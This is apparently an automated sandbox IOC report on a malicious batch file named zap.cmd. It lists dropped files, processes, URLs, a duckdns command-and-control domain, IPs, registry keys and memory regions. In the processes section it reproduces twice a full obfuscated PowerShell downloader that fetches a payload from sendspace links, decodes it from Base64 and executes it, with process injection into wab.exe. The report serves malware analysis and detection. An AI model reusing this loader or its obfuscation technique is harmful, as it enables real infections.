IOC Report
zap.cmd

loading gif

Files

File Path
Type
Category
Malicious
zap.cmd
ASCII text, with very long lines (6229), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cyjwm3f.enn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trerqzvk.t1n.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhdutsjh.vxt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zggjvx1h.qtt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Innumerable.Sno
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VU7C3MF82ACSTAFRWRJN.temp
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
tbsagyw.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://fs03n1.sendspace.com/
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://www.sendspace.com/pro/dl/jj4uw4P
unknown
https://fs03n4.sendspace.com
unknown
https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv
69.31.136.17
http://www.sendspace.com
unknown
https://github.com/Pester/Pester
unknown
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdyku
unknown
https://www.sendspace.com
unknown
https://fs03n1.sendspace.com/v
unknown
https://fs03n1.sendspace.com/y
unknown
https://www.sendspace.com/
unknown
https://www.sendspace.com/pro/dl/jj4uw4
104.21.28.80
http://fs03n4.sendspace.com
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin
69.31.136.17
https://www.sendspace.com/%I8V
unknown
https://aka.ms/pscore68
unknown
https://www.sendspace.com/pro/dl/jj4uw4XR
unknown
https://fs03n4.sendspaX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.sendspace.com/pro/dl/ug8lu5
104.21.28.80
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
tbsagyw.duckdns.org
12.202.180.134
malicious
fs03n4.sendspace.com
69.31.136.17
www.sendspace.com
104.21.28.80
fs03n1.sendspace.com
69.31.136.17

IPs

IP
Domain
Country
Malicious
12.202.180.134
tbsagyw.duckdns.org
United States
malicious
69.31.136.17
fs03n4.sendspace.com
United States
104.21.28.80
www.sendspace.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
A044000
direct allocation
page execute and read and write
malicious
23191000
trusted library allocation
page read and write
malicious
5144000
remote allocation
page execute and read and write
malicious
8440000
direct allocation
page execute and read and write
malicious
573F000
trusted library allocation
page read and write
malicious
24C677EE000
trusted library allocation
page read and write
malicious
23170000
trusted library allocation
page read and write
2727000
trusted library allocation
page execute and read and write
2B10000
heap
page read and write
9644000
direct allocation
page execute and read and write
26310000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
22E8C000
stack
page read and write
3090000
heap
page read and write
25A40000
trusted library allocation
page read and write
7FFD34700000
trusted library allocation
page execute and read and write
741513A000
stack
page read and write
25710000
trusted library allocation
page read and write
7092000
heap
page read and write
24C57781000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
24C5564B000
heap
page read and write
258B0000
trusted library allocation
page read and write
2B30000
trusted library allocation
page read and write
2972000
heap
page read and write
23040000
trusted library allocation
page read and write
77C1000
heap
page read and write
26320000
trusted library allocation
page read and write
77BA000
heap
page read and write
24C6F7A1000
heap
page read and write
24C57C7C000
trusted library allocation
page read and write
697E000
stack
page read and write
25760000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
77C5000
heap
page read and write
25700000
trusted library allocation
page read and write
26F3000
trusted library allocation
page execute and read and write
22228B14000
heap
page read and write
25A40000
trusted library allocation
page read and write
7E90000
heap
page read and write
231CB000
trusted library allocation
page read and write
7FFD34870000
trusted library allocation
page read and write
258ED000
stack
page read and write
6EBE000
stack
page read and write
814D000
heap
page read and write
7370000
trusted library allocation
page read and write
29D4000
heap
page read and write
24C5780D000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
2543C000
stack
page read and write
22228B15000
heap
page read and write
25A50000
trusted library allocation
page read and write
22C5E000
stack
page read and write
22BDE000
stack
page read and write
7802000
heap
page read and write
688E000
stack
page read and write
25700000
trusted library allocation
page read and write
6AC0000
direct allocation
page read and write
BE44000
direct allocation
page execute and read and write
8149000
heap
page read and write
23040000
trusted library allocation
page read and write
24C6F8D7000
heap
page execute and read and write
2564B000
heap
page read and write
807C000
stack
page read and write
24C55684000
heap
page read and write
54F6000
trusted library allocation
page read and write
2910000
heap
page read and write
23040000
trusted library allocation
page read and write
6A8B000
stack
page read and write
7FFD347C0000
trusted library allocation
page read and write
7FFD3454D000
trusted library allocation
page execute and read and write
73C0000
trusted library allocation
page read and write
25750000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
24C67A77000
trusted library allocation
page read and write
7414CFE000
stack
page read and write
2AEE000
stack
page read and write
25A30000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
2592B000
stack
page read and write
72FD000
stack
page read and write
7FFD34740000
trusted library allocation
page read and write
24C57620000
heap
page read and write
22D9E000
stack
page read and write
25700000
trusted library allocation
page read and write
272B000
trusted library allocation
page execute and read and write
25A40000
trusted library allocation
page read and write
22E4D000
stack
page read and write
2720000
trusted library allocation
page read and write
258B1000
trusted library allocation
page read and write
24C57080000
trusted library allocation
page read and write
7082000
heap
page read and write
25A50000
trusted library allocation
page read and write
24C59548000
trusted library allocation
page read and write
22CDE000
stack
page read and write
7FFD34722000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
252C7000
trusted library allocation
page read and write
24C58BE2000
trusted library allocation
page read and write
7740000
heap
page readonly
723E000
stack
page read and write
23120000
heap
page execute and read and write
7FFD34760000
trusted library allocation
page read and write
25479000
stack
page read and write
7FFD346F5000
trusted library allocation
page read and write
8104000
heap
page read and write
2309E000
stack
page read and write
23040000
trusted library allocation
page read and write
24C579AD000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
26330000
trusted library allocation
page read and write
727F000
stack
page read and write
23040000
trusted library allocation
page read and write
24C6FA01000
heap
page read and write
25A50000
trusted library allocation
page read and write
23027000
stack
page read and write
2703000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
24C59044000
trusted library allocation
page read and write
2B2D000
trusted library allocation
page execute and read and write
25A50000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
7FFD34750000
trusted library allocation
page read and write
24C55690000
heap
page read and write
24C55647000
heap
page read and write
25710000
trusted library allocation
page read and write
7907000
heap
page read and write
24C6F954000
heap
page read and write
25A50000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
26310000
trusted library allocation
page read and write
7FFD34850000
trusted library allocation
page read and write
22D1E000
stack
page read and write
7138000
trusted library allocation
page read and write
29B4000
heap
page read and write
68CE000
stack
page read and write
25700000
trusted library allocation
page read and write
7FFD346FA000
trusted library allocation
page read and write
23040000
trusted library allocation
page read and write
25A40000
trusted library allocation
page read and write
22228B20000
heap
page read and write
231E0000
trusted library allocation
page read and write
24C59554000
trusted library allocation
page read and write
8460000
direct allocation
page read and write
64CE000
stack
page read and write
22DDF000
stack
page read and write
24C5561C000
heap
page read and write
7150000
trusted library allocation
page read and write
231D6000
trusted library allocation
page read and write
24C57FA2000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
24C6F94C000
heap
page read and write
23040000
trusted library allocation
page read and write
83FE000
stack
page read and write
259AE000
stack
page read and write
8390000
trusted library allocation
page execute and read and write
7DC0000
heap
page read and write
24C557D0000
heap
page read and write
6298BFE000
unkown
page read and write
24C57FBD000
trusted library allocation
page read and write
24C57255000
heap
page read and write
71B7000
trusted library allocation
page read and write
25740000
trusted library allocation
page read and write
24C57C02000
trusted library allocation
page read and write
7160000
trusted library allocation
page execute and read and write
24C6F890000
heap
page execute and read and write
25A50000
trusted library allocation
page read and write
7EA0000
trusted library allocation
page execute and read and write
7FFD34542000
trusted library allocation
page read and write
7FFD34730000
trusted library allocation
page execute and read and write
2B48000
heap
page read and write
25230000
trusted library allocation
page read and write
7FFD347F0000
trusted library allocation
page read and write
271A000
trusted library allocation
page execute and read and write
25A50000
trusted library allocation
page read and write
7FFD34626000
trusted library allocation
page execute and read and write
7FFD34880000
trusted library allocation
page read and write
25609000
heap
page read and write
24C57C0D000
trusted library allocation
page read and write
7758000
heap
page read and write
AA44000
direct allocation
page execute and read and write
24C6F8E0000
heap
page read and write
2538000
stack
page read and write
25A50000
trusted library allocation
page read and write
24C570FE000
heap
page read and write
6C20000
direct allocation
page read and write
22228AD0000
heap
page read and write
7E8E000
stack
page read and write
25A40000
trusted library allocation
page read and write
260CC000
stack
page read and write
24C5765F000
heap
page read and write
254B0000
trusted library allocation
page read and write
4744000
remote allocation
page execute and read and write
293C000
heap
page read and write
25A40000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
24C67781000
trusted library allocation
page read and write
23045000
trusted library allocation
page read and write
254B6000
trusted library allocation
page read and write
7750000
heap
page read and write
6A90000
direct allocation
page read and write
7FFD34544000
trusted library allocation
page read and write
252B0000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
2D5F000
unkown
page read and write
23040000
trusted library allocation
page read and write
24C558C0000
heap
page readonly
24C5559D000
heap
page read and write
26F4000
trusted library allocation
page read and write
22228D10000
heap
page read and write
78D0000
direct allocation
page read and write
2560C000
heap
page read and write
25A50000
trusted library allocation
page read and write
2B10000
trusted library allocation
page read and write
258B0000
trusted library allocation
page read and write
7415E0E000
stack
page read and write
25A50000
trusted library allocation
page read and write
25A50000
trusted library allocation
page read and write
